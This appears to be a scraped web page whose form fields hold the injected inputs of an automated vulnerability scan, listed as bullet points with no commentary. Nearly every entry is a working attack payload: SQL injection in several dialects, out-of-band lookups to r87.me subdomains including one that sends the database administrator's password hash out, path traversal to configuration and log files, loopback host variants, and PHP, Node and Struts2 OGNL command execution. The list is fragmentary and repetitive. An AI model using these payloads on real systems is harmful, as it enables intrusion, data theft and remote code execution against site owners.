  • : -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
  • :
  • :
  • 3: 3
  • :
  • 3: //r87?com/?
  • \kontak\konten\create:
  • 36.91.147.95/trace.axd:
  • 3: -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
  • 3: 3
  • :
  • 3: 3
  • 3: 3
  • : @r87.com
  • 36.91.37727/trace.axd:
  • :
  • \kontak\konten\create: 3
  • : (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
  • :
  • 3: 3
  • :
  • :
  • 000177.000.00000.000001/trace.axd: 3
  • 3: @r87.com
  • 3: 3
  • \konten\create:
  • 3: (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
  • 3: 3
  • :
  • 3: 3
  • 0177.0.0.1/trace.axd: 3
  • 3: 3
  • :
  • : cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
  • 3: 3
  • \konten\create: 3
  • 0177.0.1/trace.axd: 3
  • :
  • 3: 3
  • :
  • :
  • 3: cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
  • :
  • 0177.1/trace.axd: 3
  • WEB-INF/web.xml:
  • 3: 3
  • 3: 3
  • 3: 3
  • : '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
  • 017700000001/trace.axd: 3
  • 3: 3
  • WEB-INF/web.xml: 3
  • :
  • :
  • 0x7f.0.0.1/trace.axd: 3
  • 3: '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
  • :
  • :
  • 3: 3
  • /../../../../../../../../../../WEB-INF/web.xml:
  • 0x7f.0.1/trace.axd: 3
  • : (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
  • 3: 3
  • 3: 3
  • 3: 3
  • : response.write(268409241-87024)'
  • 0x7f.1/trace.axd: 3
  • /../../../../../../../../../../WEB-INF/web.xml: 3
  • 3: (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
  • :
  • :
  • :
  • 0x7f000001/trace.axd: 3
  • 3: response.write(268409241-44131)'
  • /../../../../../../../../../../var/log/apache2/access.log:
  • : NSFTW
  • 3: 3
  • require 'resolv';Resolv.getaddress ("acmpznnyxlpcerwpjtg-33dsby6djflyv0w0ldpt".concat "b7k.r87.me"):
  • 3: 3
  • 3: 3
  • 127.0.0.1/trace.axd: 3
  • : +response.write(268409241-10876)'
  • :
  • 3: NSFTW
  • require 'resolv';Resolv.getaddress ("acmpznnyxlwmmq416exdcmfc2cjttsiaiq4d0yvm".concat "t4a.r87.me"): 3
  • /../../../../../../../../../../var/log/apache2/access.log: 3
  • 127.0.1/trace.axd: 3
  • :
  • :
  • 3: +response.write(268409241-60063)'
  • 3: 3
  • 127.1/trace.axd: 3
  • : '+NSFTW+'
  • /../../../../../../../../../../etc/httpd/logs/access.log:
  • 3: 3
  • : "+response.write(268409241-84133)+"
  • 3: 3
  • 16777343/trace.axd: 3
  • :
  • 3: '+NSFTW+'
  • : ' WAITFOR DELAY '0:0:25'--
  • /../../../../../../../../../../etc/httpd/logs/access.log: 3
  • 3: "+response.write(268409241-13325)+"
  • 00044.00133.0000223.00000137/trace.axd: 3
  • :
  • 3: 3
  • :
  • : (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
  • : exec('xp_dirtree ''\\acmpznnyxla8xiqn1f7buwfzgqbj8ztkhwtg3wph'+'gvc.r87.me'+'\c$\a''')
  • 3: ' WAITFOR DELAY '0:0:25'--
  • 044.6001503/trace.axd: 3
  • : <% response.write(268409241-72950) %>
  • 3: 3
  • /../../../../../../../../../../var/log/nginx/access.log:
  • :
  • 3: exec('xp_dirtree ''\\acmpznnyxl1fwf2hieaowwcmshdgcw0fjruyfq8n'+'jxg.r87.me'+'\c$\a''')
  • 3: (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
  • 3: 3
  • 044.91.147.95/trace.axd: 3
  • : 1 WAITFOR DELAY '0:0:25'--
  • 3: <% response.write(268409241-65450) %>
  • :
  • : declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.acmpznnyxldrgc8jcxwbdn6e_4j068mbasnnobtx'+'rpy.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
  • 3: 3
  • /../../../../../../../../../../var/log/nginx/access.log: 3
  • 044.91.37727/trace.axd: 3
  • : -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  • :
  • 3: 1 WAITFOR DELAY '0:0:25'--
  • 3: 3
  • : print(int)0xFFF9999-2181
  • 3: declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.acmpznnyxl07spa5bt0f_zphyybyx371o7y_k6ah'+'mg0.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
  • :
  • 04426711537/trace.axd: 3
  • 3: -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
  • /../../../../../../../../../../opt/lampp/logs/access_log:
  • : WAITFOR DELAY '0:0:25'--
  • 3: 3
  • :
  • : 1;exec('xp_dirtree ''\\acmpznnyxlyppryduunib8kne8etchvzxazdg8f4'+'gls.r87.me'+'\c$\a''')--
  • 0x24.6001503/trace.axd: 3
  • 3: print(int)0xFFF9999-41197
  • 3: 3
  • : -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
  • 3: 3
  • 3: WAITFOR DELAY '0:0:25'--
  • 3: 1;exec('xp_dirtree ''\\acmpznnyxluvtbr8h9piqopoe7litjwl1fjjnwwj'+'egc.r87.me'+'\c$\a''')--
  • /../../../../../../../../../../opt/lampp/logs/access_log: 3
  • 0x24.91.147.95/trace.axd: 3
  • :
  • :
  • :
  • : print(int)0xFFF9999-5543;
  • 3: -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
  • : 1) WAITFOR DELAY '0:0:25'--
  • : -1';exec('xp_dirtree ''\\acmpznnyxlikl9ywusmrqbxveoaphffok6tigep8'+'-gm.r87.me'+'\c$\a''')--
  • 0x24.91.37727/trace.axd: 3
  • /../../../../../../../../../../var/log/lighttpd/access.log:
  • 3: 3
  • 3: 3
  • 3: 3
  • 3: print(int)0xFFF9999-48485;
  • 3: 1) WAITFOR DELAY '0:0:25'--
  • : 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
  • 3: -1';exec('xp_dirtree ''\\acmpznnyxltycduztrs058hbgbcjeniaaamuqgi-'+'hcu.r87.me'+'\c$\a''')--
  • 0x245b935f/trace.axd: 3
  • :
  • /../../../../../../../../../../var/log/lighttpd/access.log: 3
  • :
  • 3: 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
  • : ') WAITFOR DELAY '0:0:25'--
  • : 1) exec('xp_dirtree ''\\acmpznnyxlfoapisrw5rj6zuxul2eo2_mrkjpjbi'+'k3i.r87.me'+'\c$\a''')--
  • :
  • : +print(int)0xFFF9999-21461;//
  • 1603492644/trace.axd: 3
  • 3: 3
  • /../../../../../../../../../../AppServ/Apache24/logs/access.log:
  • 3: 3
  • : (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
  • 3: ') WAITFOR DELAY '0:0:25'--
  • 3: 1) exec('xp_dirtree ''\\acmpznnyxlk8lyp47w_iznoy0s6inqyae5ehdq6s'+'if4.r87.me'+'\c$\a''')--
  • 36.6001503/trace.axd: 3
  • 3: +print(int)0xFFF9999-8513;//
  • :
  • 3: 3
  • :
  • /../../../../../../../../../../AppServ/Apache24/logs/access.log: 3
  • 3: (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
  • : ')) WAITFOR DELAY '0:0:25'--
  • : 1')exec('xp_dirtree ''\\acmpznnyxl8kz2r89rdpljajppbdrptq3w2ltmf9'+'xim.r87.me'+'\c$\a''')--
  • 36.91.147.95/trace.axd: 3
  • 3: 3
  • : '+print(int)0xFFF9999-65875+'
  • :
  • 3: 3
  • : '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
  • 3: ')) WAITFOR DELAY '0:0:25'--
  • 3: 1')exec('xp_dirtree ''\\acmpznnyxlhpaeemmtw7a7fpq6meppzrp-swp_a1'+'ons.r87.me'+'\c$\a''')--
  • 36.91.37727/trace.axd: 3
  • :
  • ../../../../../../../../../../xampp/apache/logs/access.log:
  • 3: '+print(int)0xFFF9999-79914+'
  • 3: '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
  • 3: 3
  • : 1))exec('xp_dirtree ''\\acmpznnyxltur-wiojm_jncizrlnoptvyv84wbio'+'kg8.r87.me'+'\c$\a''')--
  • :
  • :
  • : 1)) WAITFOR DELAY '0:0:25'--
  • 3: 3
  • : "+print(int)0xFFF9999-84133+"
  • ../../../../../../../../../../xampp/apache/logs/access.log: 3
  • : '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
  • 3: 1))exec('xp_dirtree ''\\acmpznnyxlpbsfq3wmw9ijnqu8sfewqdshsbgk__'+'71u.r87.me'+'\c$\a''')--
  • :
  • :
  • 3: 3
  • :
  • 3: 1)) WAITFOR DELAY '0:0:25'--
  • 3: "+print(int)0xFFF9999-19099+"
  • : 1'))exec('xp_dirtree ''\\acmpznnyxl1gats36drgctrftpgxsfpbd15krash'+'p-s.r87.me'+'\c$\a''')--
  • 3: '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
  • /../../../../../../../../../../var/log/apache/access.log:
  • :
  • 3: 3
  • 3: 3
  • :
  • : 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • 3: 1'))exec('xp_dirtree ''\\acmpznnyxlbgu1kzb9tbamu4-knr36h7wqlsr1mt'+'vzg.r87.me'+'\c$\a''')--
  • : <?=(int)0xFFF9999-58062;//?>
  • :
  • : -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
  • :
  • /../../../../../../../../../../var/log/apache/access.log: 3
  • :
  • 3: 3
  • : syscolumns WHERE 2>3;exec('xp_dirtree ''\\acmpznnyxlpi2_pfoait6unep6dbq___uck7qe3_'+'rek.r87.me'+'\c$\a''')--
  • 3: 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • :
  • 3: 3
  • 3: -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
  • 3: <?=(int)0xFFF9999-80923;//?>
  • 3: syscolumns WHERE 2>3;exec('xp_dirtree ''\\acmpznnyxlfml6quhfmmriwy37te4tnj2dlx3n08'+'sji.r87.me'+'\c$\a''')--
  • :
  • :
  • :
  • : 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • 3: 3
  • :
  • : DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','acmpznnyxlwtvvvn5j955grynbkyvcl8h1biydww'+'1ck.r87.me')exec sp_executesql @r
  • : -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
  • 3: 3
  • :
  • : {php}print(int)0xFFF9999-65698;{/php}
  • 3: 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • 3: 3
  • 3: DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','acmpznnyxlx_nc_rjdpzq_o9jtslubxz47k4kzpx'+'qak.r87.me')exec sp_executesql @r
  • 3: 3
  • :
  • :
  • :
  • 3: -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
  • :
  • : 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • 3: {php}print(int)0xFFF9999-67344;{/php}
  • : 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','acmpznnyxlh8sqxqdmajyq-zdtejkwpao6gohpf1'+'_9c.r87.me')exec sp_executesql @r--
  • :
  • 3: 3
  • 3: 3
  • :
  • 3: 3
  • 3: 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • 3: 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','acmpznnyxlnn1l8age2ky2_koeagljtojnp91gec'+'x5w.r87.me')exec sp_executesql @r--
  • :
  • : '{${print(int)0xFFF9999-88925}}'
  • :
  • 3: 3
  • :
  • :
  • : syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • : -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','acmpznnyxlw-p0owwy7v3dpbczueot34gt5v6ies'+'hn8.r87.me')exec sp_executesql @r--
  • :
  • :
  • 3: '{${print(int)0xFFF9999-88996}}'
  • 3: 3
  • 3: 3
  • 3: -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','acmpznnyxlvaf0onibzfinsbpv5ip3yyausrepr1'+'udq.r87.me')exec sp_executesql @r--
  • 3: syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
  • :
  • 3: 3
  • 3: 3
  • :
  • :
  • : SELECT dblink_connect('host=acmpznnyxlcjclxq9asjftxdp9gbfd2tch5dtsro'||'mye.r87.me user=a password=a connect_timeout=2')
  • : [php]print(int)0xFFF9999-4361;[/php]
  • : 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
  • :
  • 3: 3
  • 3: SELECT dblink_connect('host=acmpznnyxlodr13mhdxduluotvd3x57dgl9fof2j'||'axy.r87.me user=a password=a connect_timeout=2')
  • :
  • 3: 3
  • :
  • :
  • 3: 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/
  • :
  • : dblink_connect('host=acmpznnyxlv5vv9sulozsd2igiulrtak8q627sj1'||'qgw.r87.me user=a password=a connect_timeout=2')
  • :
  • :
  • 3: [php]print(int)0xFFF9999-40235;[/php]
  • 3: 3
  • 3: 3
  • : -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
  • 3: dblink_connect('host=acmpznnyxl6pjxuv59w1_b821ib69sopgkjj3xgc'||'mt8.r87.me user=a password=a connect_timeout=2')
  • 3: 3
  • :
  • 3: 3
  • :
  • :
  • : cast((SELECT dblink_connect('host=acmpznnyxlxonmc7gx4hewdfshi7wfz6mkxbji_x'||'v4i.r87.me user=a password=a connect_timeout=2')) as numeric)
  • 3: -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
  • : %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='39185').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
  • :
  • :
  • :
  • 3: 3
  • 3: cast((SELECT dblink_connect('host=acmpznnyxlqijbacr2udzr75u7jehwg6mkkvn0ib'||'lt4.r87.me user=a password=a connect_timeout=2')) as numeric)
  • 3: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='23250').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
  • :
  • 3: 3
  • : ((select sleep(25)))a-- 1
  • :
  • 3: 3
  • : cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(106)||chr(99)||chr(122)||chr(113)||chr(56)||chr(121)||chr(113)||chr(99)||chr(121)||chr(107)||chr(100)||chr(113)||chr(109)||chr(118)||chr(119)||chr(113)||chr(99)||chr(48)||chr(51)||chr(109)||chr(122)||chr(109)||chr(99)||chr(104)||chr(52)||chr(114)||chr(109)||chr(106)||chr(111)||chr(98)||chr(108)||chr(107)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
  • 3: 3
  • : print localtime()*0+0xFFF9999-47861
  • :
  • 3: 3
  • 3: ((select sleep(25)))a-- 1
  • :
  • 3: cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(97)||chr(54)||chr(109)||chr(98)||chr(102)||chr(97)||chr(103)||chr(103)||chr(117)||chr(118)||chr(50)||chr(99)||chr(100)||chr(50)||chr(51)||chr(99)||chr(120)||chr(120)||chr(49)||chr(112)||chr(121)||chr(122)||chr(114)||chr(97)||chr(48)||chr(54)||chr(115)||chr(99)||chr(121)||chr(115)||chr(112)||chr(103)||chr(97)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
  • :
  • :
  • 3: print localtime()*0+0xFFF9999-52158
  • : (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
  • : '||(SELECT dblink_connect('host=acmpznnyxla3bjopmtcj7qt_icjactbie-ppgetl'||'gxy.r87.me user=a password=a connect_timeout=2'))||'
  • 3: 3
  • :
  • 3: 3
  • : eval('print localtime()*0+0xFFF9999-17838')
  • 3: (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
  • 3: '||(SELECT dblink_connect('host=acmpznnyxldw_xfv-strjwguahihpnizsaapfevc'||'io4.r87.me user=a password=a connect_timeout=2'))||'
  • :
  • :
  • :
  • :
  • 3: eval('print localtime()*0+0xFFF9999-15846')
  • : (select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxl6e4v_q1ijmj5gydwt6uiqjuuspubfk'||'tho.r87.me') from DUAL)
  • : 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
  • :
  • 3: 3
  • 3: 3
  • : '+print localtime()*0+0xFFF9999-96261+'
  • 3: (select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxladigrvdlucczcnh95sffjg6asnysfe'||'mtc.r87.me') from DUAL)
  • 3: 3
  • :
  • 3: 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
  • :
  • :
  • : (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxl7ikb_aypo_ewo1bejlubz9mxhhn7gd'||'3-a.r87.me') from DUAL))))
  • 3: '+print localtime()*0+0xFFF9999-95475+'
  • :
  • :
  • : 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
  • 3: (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxlz2shphjoqp5aqsrjtm8mdg4ncgh6ua'||'dxu.r87.me') from DUAL))))
  • 3: 3
  • 3: 3
  • : "+print localtime()*0+0xFFF9999-69733+"
  • :
  • 3: 3
  • : '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxlmrl_c2nqjfvm9vqsrm1efvq240r0qx'||'bda.r87.me') from DUAL))||'
  • 3: 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
  • 3: 3
  • :
  • 3: "+print localtime()*0+0xFFF9999-26970+"
  • :
  • :
  • 3: '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('acmpznnyxlsqdv28qs1fby_lk6gebcpeqbejzsek'||'-mk.r87.me') from DUAL))||'
  • : 1';SELECT pg_sleep(25)--
  • 3: 3
  • : arguments[1].end(require('child_process').execSync('expr 268409241 - 83750'))
  • 3: 3
  • 3: 3
  • : (select UTL_INADDR.GET_HOST_ADDRESS(chr(97)||chr(99)||chr(109)||chr(112)||chr(122)||chr(110)||chr(110)||chr(121)||chr(120)||chr(108)||chr(112)||chr(114)||chr(115)||chr(49)||chr(115)||chr(101)||chr(115)||chr(111)||chr(115)||chr(103)||chr(97)||chr(111)||chr(53)||chr(101)||chr(57)||chr(45)||chr(121)||chr(115)||chr(111)||chr(118)||chr(101)||chr(108)||chr(112)||chr(116)||chr(112)||chr(102)||chr(52)||chr(101)||chr(115)||chr(56)||chr(109)||chr(105)||chr(115)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
  • 3: 3
  • 3: 3
